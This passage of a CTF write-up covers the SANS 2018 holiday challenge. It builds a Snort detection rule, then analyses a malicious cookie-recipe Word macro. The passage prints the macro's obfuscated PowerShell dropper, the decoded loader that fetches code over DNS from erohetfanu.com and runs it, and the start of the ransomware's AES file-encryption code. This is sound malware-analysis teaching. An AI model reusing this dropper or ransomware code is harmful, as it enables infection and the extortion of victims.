&lt;p&gt;Let's download some of these PCAP files and see if we can find a common
pattern.  You can use KringleCastle's website, mentioned herebefore, or you can
download some of the PCAP files I had during the challenge:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/snort.log.1546631032.853224.pcap"&gt;snort.log.1546631032.853224.pcap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/snort.log.1546631066.7843747.pcap"&gt;snort.log.1546631066.7843747.pcap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/snort.log.1546631107.349513.pcap"&gt;snort.log.1546631107.349513.pcap&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If we open these PCAP files, we see exclusively TXT DNS traffic. However, you
notice rapidly that some of these domains don't seem legitimate. Some of the
requests made interrogate a weird looking domain, with some sort of hash as a
part of the subdomain, and the TXT answers are extremely long. This is clearly
very fishy, and we can easily guess that this is our ransomware traffic.&lt;/p&gt;
&lt;p&gt;However, we can't use the source IP address, the destination IP address, or the
domain name as &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Indicator_of_compromise"&gt;IOCs&lt;/a&gt;,
because they never stay the same. The only constant seems to be this hash,
&lt;code&gt;77616E6E61636F6F6B69652E6D696E2E707331&lt;/code&gt;, which is part of the subdomain.&lt;/p&gt;
&lt;p&gt;Let's create a Snort rule that will trigger an alert every time we see this
hash. I used &lt;a class="reference external" href="https://resources.infosecinstitute.com/snort-rules-workshop-part-one/"&gt;this website&lt;/a&gt;
and StackOverflow to determine how to do so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;alert udp any any -&amp;gt; any any (msg:&amp;quot;Ransomware trafic detected&amp;quot;; pcre:&amp;quot;/77616E6E61636F6F6B69652E6D696E2E707331/&amp;quot;; metadata:service dns; sid:1337; rev:3;)
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's what it means:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;alert&lt;/code&gt;: create an alert when this rule matches&lt;/li&gt;
&lt;li&gt;&lt;code&gt;udp&lt;/code&gt;: we only care about UDP traffic&lt;/li&gt;
&lt;li&gt;&lt;code&gt;any any -&amp;gt; any any&lt;/code&gt;: we look at traffic from any source to any
destination. I tried to do some fine tuning here, but I didn't catch every
traffic, only the requests made by the ransomware (and not the answers from
the server). This is likely overkill and wouldn't work in a true production
environment.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;msg&lt;/code&gt;: the message that will be displayed in our alert&lt;/li&gt;
&lt;li&gt;&lt;code&gt;pcre:&amp;quot;/77616E6E61636F6F6B69652E6D696E2E707331/&amp;quot;&lt;/code&gt;: our alert will only
be triggered if it matches this regex. Here, it's a pretty simple regex that
only looks if the IOC hash is in the traffic.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;metadata&lt;/code&gt;: the UDP traffic is DNS&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sid&lt;/code&gt;, &lt;code&gt;rev&lt;/code&gt;: id and revision number of the rule&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let's add this rule at the end of our rule file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7a674ac839a9:~$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; -e &lt;span class="s1"&gt;&amp;#39;\nalert udp any any -&amp;gt; any any (msg:&amp;quot;Ransomware trafic detected&amp;quot;; pcre:&amp;quot;/77616E6E61636F6F6B69652E6D696E2E707331/&amp;quot;; metadata:service dns; sid:1337; rev:3;)&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; /etc/snort/rules/local.rules
&lt;span class="gp"&gt;elf@7a674ac839a9:~$&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;[+] Congratulation! Snort is alerting on all ransomware and only the ransomware!&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we now have an alert every time the ransomware generates traffic.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="malware-dropper"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id41"&gt;Malware Dropper&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Now that the ransomware traffic is stopped, Alabaster gives us an archive,
which, he supposes, is the initial dropper for the ransomware. We must find
the domain it communicates with.&lt;/p&gt;
&lt;img alt="alabaster.png" class="align-center" src="/images/sans-christmas-challenge-2018/alabaster.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Thank you so much! Snort IDS is alerting on each new ransomware infection
in our network.&lt;/p&gt;
&lt;p&gt;Hey, you're pretty good at this security stuff. Could you help me further
with what I suspect is a malicious Word document?&lt;/p&gt;
&lt;p&gt;All the elves were emailed a cookie recipe right before all the infections.
Take &lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/CHOCOLATE_CHIP_COOKIE_RECIPE.zip"&gt;this document&lt;/a&gt;
with a password of &lt;strong&gt;elves&lt;/strong&gt; and find the domain it communicates with.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, let's extract this archive:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; 7z -pelves x CHOCOLATE_CHIP_COOKIE_RECIPE.zip

&lt;span class="go"&gt;7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21&lt;/span&gt;
&lt;span class="go"&gt;p7zip Version 16.02 (locale=fr_FR.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz (806EA),ASM,AES-NI)&lt;/span&gt;

&lt;span class="go"&gt;Scanning the drive for archives:&lt;/span&gt;
&lt;span class="go"&gt;1 file, 110699 bytes (109 KiB)&lt;/span&gt;

&lt;span class="go"&gt;Extracting archive: CHOCOLATE_CHIP_COOKIE_RECIPE.zip&lt;/span&gt;
&lt;span class="go"&gt;--&lt;/span&gt;
&lt;span class="go"&gt;Path = CHOCOLATE_CHIP_COOKIE_RECIPE.zip&lt;/span&gt;
&lt;span class="go"&gt;Type = zip&lt;/span&gt;
&lt;span class="go"&gt;Physical Size = 110699&lt;/span&gt;

&lt;span class="go"&gt;Everything is Ok&lt;/span&gt;

&lt;span class="go"&gt;Size:       113540&lt;/span&gt;
&lt;span class="go"&gt;Compressed: 110699&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt;  ls -lh
&lt;span class="go"&gt;total 228K&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;-rw-r--r-- 1 useless useless 111K déc.  17 18:46 CHOCOLATE_CHIP_COOKIE_RECIPE.docm&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;-rw-r--r-- 1 useless useless 109K déc.  18 04:17 CHOCOLATE_CHIP_COOKIE_RECIPE.zip&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, it's a &lt;code&gt;.docm&lt;/code&gt; file. This is probably a Microsoft Office file
with a malicious macro that will download and execute the malware. Let's open
it &lt;strong&gt;with extra care not to execute the macro&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;For those of you who only want the chocolate chip cookie recipe, you can find
it &lt;a class="reference external" href="#appendix-chocolate-chip-cookie-recipe"&gt;in the appendix&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If we take a look at the macros in this Office file, we can see that two
functions, &lt;code&gt;Document_Open&lt;/code&gt; and &lt;code&gt;AutoOpen&lt;/code&gt; were created:&lt;/p&gt;
&lt;img alt="libreoffice_macro_docm.png" class="align-center" src="/images/sans-christmas-challenge-2018/libreoffice_macro_docm.png" /&gt;
&lt;p&gt;&lt;em&gt;(Yes, it's LibreOffice, sue me)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;These functions are designed to be executed as soon as the document is open.
Let's take a look at the source code of these functions:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Rem Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Sub AutoOpen()
Dim cmd As String
&lt;span class="hll"&gt;cmd = &amp;quot;powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C &amp;quot;&amp;quot;sal a New-Object; iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(&amp;#39;lVHRSsMwFP2VSwksYUtoWkxxY4iyir4oaB+EMUYoqQ1syUjToXT7d2/1Zb4pF5JDzuGce2+a3tXRegcP2S0lmsFA/AKIBt4ddjbChArBJnCCGxiAbOEMiBsfSl23MKzrVocNXdfeHU2Im/k8euuiVJRsZ1Ixdr5UEw9LwGOKRucFBBP74PABMWmQSopCSVViSZWre6w7da2uslKt8C6zskiLPJcJyttRjgC9zehNiQXrIBXispnKP7qYZ5S+mM7vjoavXPek9wb4qwmoARN8a2KjXS9qvwf+TSakEb+JBHj1eTBQvVVMdDFY997NQKaMSzZurIXpEv4bYsWfcnA51nxQQvGDxrlP8NxH/kMy9gXREohG&amp;#39;),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()&amp;quot;&amp;quot; &amp;quot;
&lt;/span&gt;Shell cmd
End Sub
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As soon as the document gets opened, a (quite ugly) PowerShell command is
executed. We can see from the source code that there is some base64-encoding,
and some compressing. Instead of doing the analysis manually, we'll use
PowerShell to execute the command. &lt;strong&gt;But&lt;/strong&gt; in order &lt;strong&gt;not to get infected
ourselves&lt;/strong&gt;, we'll replace every occurrence of &lt;code&gt;IEX&lt;/code&gt; (or
&lt;code&gt;Invoke-Expression&lt;/code&gt;) by a &lt;code&gt;Write-Output&lt;/code&gt;. This way, the source
code will be displayed instead of being executed.&lt;/p&gt;
&lt;p&gt;So, let's see what this PowerShell gibberish means:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\Users\admin&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;sal &lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;Write-Output&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;IO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;StreamReader&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;IO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Compression&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DeflateStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[IO.MemoryStream][Convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;FromBase64String&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;lVHRSsMwFP2VSwksYUtoWkxxY4iyir4oaB+EMUYoqQ1syUjToXT7d2/1Zb4pF5JDzuGce2+a3tXRegcP2S0lmsFA/AKIBt4ddjbChArBJnCCGxiAbOEMiBsfSl23MKzrVocNXdfeHU2Im/k8euuiVJRsZ1Ixdr5UEw9LwGOKRucFBBP74PABMWmQSopCSVViSZWre6w7da2uslKt8C6zskiLPJcJyttRjgC9zehNiQXrIBXispnKP7qYZ5S+mM7vjoavXPek9wb4qwmoARN8a2KjXS9qvwf+TSakEb+JBHj1eTBQvVVMdDFY997NQKaMSzZurIXpEv4bYsWfcnA51nxQQvGDxrlP8NxH/kMy9gXREohG&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="no"&gt;[IO.Compression.CompressionMode]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Decompress&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;&lt;span class="no"&gt;[Text.Encoding]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;ASCII&lt;/span&gt;&lt;span class="p"&gt;)).&lt;/span&gt;&lt;span class="n"&gt;ReadToEnd&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="go"&gt;function H2A($a) {$o; $a -split &amp;#39;(..)&amp;#39; | ? { $_ }  | forEach {[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o}; $f = &amp;quot;77616E6E61636F6F6B69652E6D696E2E707331&amp;quot;; $h = &amp;quot;&amp;quot;; foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server erohetfanu.com -Name &amp;quot;$f.erohetfanu.com&amp;quot; -Type TXT).strings, 10)-1)) {$h += (Resolve-DnsName -Server erohetfanu.com -Name &amp;quot;$i.$f.erohetfanu.com&amp;quot; -Type TXT).strings}; iex($(H2A $h | Out-string))&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we get a weird function, &lt;code&gt;H2A&lt;/code&gt;, which is making DNS request to
a domain name &lt;code&gt;erohetfanu.com&lt;/code&gt;. That's the domain we're looking for.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="malware-analysis"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id42"&gt;Malware Analysis&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Alabaster wonders if the malware uses a killswitch domain, &lt;em&gt;à la WannaCry&lt;/em&gt;.&lt;/p&gt;
&lt;img alt="alabaster.png" class="align-center" src="/images/sans-christmas-challenge-2018/alabaster.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Erohetfanu.com, I wonder what that means?&lt;/p&gt;
&lt;p&gt;Unfortunately, Snort alerts show multiple domains, so blocking that one
won't be effective.&lt;/p&gt;
&lt;p&gt;I remember another ransomware in recent history had a killswitch domain
that, when registered, would prevent any further infections.&lt;/p&gt;
&lt;p&gt;Perhaps there is a mechanism like that in this ransomware? Do some more
analysis and see if you can find a fatal flaw and activate it!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's analyze the ransomware and see what we can find. First of all, let's
get the source code of the malware. Let's execute the command we found in the
previous question, &lt;strong&gt;without&lt;/strong&gt; executing &lt;code&gt;IEX&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS E:\sans-christmas-challenge-2018&amp;gt; &lt;/span&gt;&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;H2A&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$a&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;$o&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;$a&lt;/span&gt; &lt;span class="n"&gt;-split&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(..)&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;  &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="k"&gt;forEach&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="no"&gt;[char]&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;toint16&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;16&lt;/span&gt;&lt;span class="p"&gt;))}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="k"&gt;forEach&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;$o&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$o&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$o&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt; &lt;span class="nv"&gt;$f&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;77616E6E61636F6F6B69652E6D696E2E707331&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;$h&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$iin&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;..(&lt;/span&gt;&lt;span class="no"&gt;[convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;ToInt32&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$f.erohetfanu.com&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;strings&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;10&lt;/span&gt;&lt;span class="p"&gt;)-&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)){&lt;/span&gt;&lt;span class="nv"&gt;$h&lt;/span&gt; &lt;span class="p"&gt;+=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$i.$f.erohetfanu.com&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;strings&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2A&lt;/span&gt; &lt;span class="nv"&gt;$h&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;$functions = {function e_d_file($key, $File, $enc_it) {[byte[]]$key = $key;$Suffix = &amp;quot;`.wannacookie&amp;quot;;[System.Reflection.Assembly]::LoadWithPartialName(&amp;#39;System.Security.Cryptography&amp;#39;);[System.Int32]$KeySize = $key.Length*8;$AESP = New-Object &amp;#39;System.Security.Cryptography.AesManaged&amp;#39;;$AESP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AESP.BlockSize = 128;$AESP.KeySize = $KeySize;$AESP.Key = $key;$FileSR = New-Object System.IO.FileStream($File, [System.IO.FileMode]::Open);if ($enc_it) {$DestFile = $File + $Suffix} else {$DestF[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Wow, we get a lot of minified code. Let's make it a little bit more readable.
Here's the full source code of the malware. I just added carriage-returns
after every &lt;code&gt;}&lt;/code&gt;, &lt;code&gt;;&lt;/code&gt;, and indented the code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nv"&gt;$functions&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;e_d_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$File&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$enc_it&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="no"&gt;[byte[]]&lt;/span&gt;&lt;span class="nv"&gt;$key&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$Suffix&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;`.wannacookie&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="no"&gt;[System.Reflection.Assembly]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;LoadWithPartialName&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;System.Security.Cryptography&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="no"&gt;[System.Int32]&lt;/span&gt;&lt;span class="nv"&gt;$KeySize&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;*&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$AESP&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;System.Security.Cryptography.AesManaged&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Mode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.Security.Cryptography.CipherMode]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;CBC&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BlockSize&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;128&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;KeySize&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$KeySize&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Key&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$FileSR&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;FileStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$File&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;[System.IO.FileMode]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Open&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$enc_it&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$DestFile&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$File&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="nv"&gt;$Suffix&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$DestFile&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$File&lt;/span&gt; &lt;span class="o"&gt;-replace&lt;/span&gt; &lt;span class="nv"&gt;$Suffix&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="nv"&gt;$FileSW&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;FileStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$DestFile&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;[System.IO.FileMode]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Create&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$enc_it&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GenerateIV&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
            &lt;span class="nv"&gt;$FileSW&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[System.BitConverter]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;GetBytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IV&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
